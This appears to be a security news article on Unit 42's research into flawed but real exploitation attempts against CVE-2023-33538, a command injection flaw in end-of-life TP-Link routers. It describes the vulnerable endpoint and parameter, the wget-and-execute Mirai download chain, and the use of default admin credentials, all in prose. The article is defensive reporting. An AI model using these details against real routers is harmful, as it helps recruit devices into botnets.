Unit 42 Details Flawed but Real Exploitation Attempts Against End-of-Life TP-Link Routers via CVE-2023-33538
Palo Alto Networks' Unit 42 has analyzed active exploitation attempts targeting CVE-2023-33538, a command injection vulnerability in end-of-life TP-Link routers, finding that while current payloads are flawed, the underlying risk remains significant due to default credential reuse.
Palo Alto Networks' Unit 42 research team has published a deep-dive analysis of active exploitation attempts targeting CVE-2023-33538, a command injection vulnerability affecting several end-of-life TP-Link Wi-Fi router models. The vulnerability, which was publicly reported in June 2023, impacts the TL-WR940N (v2 and v4), TL-WR740N (v1 and v2), and TL-WR841N (v8 and v10) routers. Unit 42 observed a surge in automated scans and probes after the Cybersecurity and Infrastructure Security Agency (CISA) added the CVE to its Known Exploited Vulnerabilities (KEV) catalog in June 2025.
The attacks target the `/userRpm/WlanNetworkRpm` endpoint, where the `ssid1` parameter is not properly sanitized, allowing command injection via HTTP GET requests. The observed exploit payloads attempt to download and execute Mirai-like botnet malware binaries, specifically an ELF binary named `arm7` from a remote IP address. The commands use `wget` to fetch the binary, `chmod 777` to make it executable, and then execute it with the parameter `tplink`. The HTTP requests use Basic Authentication with the default `admin:admin` credential encoded in Base64.
Crucially, Unit 42's analysis reveals that the in-the-wild attacks observed were flawed and would fail to successfully compromise the targeted devices. Through firmware emulation and reverse engineering of the TL-WR940N router, the researchers confirmed that the specific exploit code used in these campaigns is not effective. However, they emphasize that the underlying vulnerability is real and exploitable with properly crafted payloads.
Successful exploitation requires authentication to the router's web interface, which means attackers must either know the credentials or rely on default credentials that have not been changed. Given the widespread use of default IoT credentials, this remains a practical infection vector. The malware downloaded in these attempts is a Mirai variant similar to the Condi IoT botnet, featuring command-and-control (C2) functionality with specific byte sequences for heartbeat responses, lockdown commands, and binary updates.
TP-Link has confirmed that the affected devices are end-of-life and no vendor patches are available. The company's official recommendation is for customers to replace these units with supported hardware and to ensure that default credentials are not used. This situation highlights the ongoing challenge of securing legacy IoT devices that are no longer receiving security updates, particularly when they are exposed to the internet with default credentials.
Palo Alto Networks customers are protected through several products and services, including Advanced URL Filtering, Advanced DNS Security, Advanced WildFire, Cortex Xpanse, and Next-Generation Firewalls with Advanced Threat Prevention. The research underscores the importance of proactive device lifecycle management and the risks associated with maintaining end-of-life network equipment in operational environments.